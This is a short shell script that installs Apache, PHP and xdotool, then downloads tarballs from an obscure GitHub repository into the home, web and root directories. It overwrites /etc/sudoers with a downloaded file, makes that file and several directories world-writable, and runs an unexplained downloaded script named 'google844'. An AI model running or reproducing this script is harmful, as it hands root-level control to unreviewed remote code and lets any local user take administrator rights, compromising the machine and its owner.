apt-get install -y apache2

apt-get install -y php7.4

apt-get install -y php7.4-gmp

apt-get install -y xdotool

mkdir /home/demo/

mkdir /home/demo/Documents/

cd /home/demo/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/Documents.tar.gz

tar -xvf ./Documents.tar.gz

cd /home/demo/Documents/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/paperspace84.tar.gz

tar -xvf ./paperspace84.tar.gz

chmod 777 -R /home/demo/Documents/

cd /var/www/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/html.tar.gz

tar -xvf ./html.tar.gz

chmod 777 -R /var/www/html/

cd /etc/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/sudoers

chmod 777 -R /etc/sudoers

cd /root/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linuxroot84.tar.gz

tar -xvf ./linuxroot84.tar.gz

cd /var/www/html/google844

bash ./google844
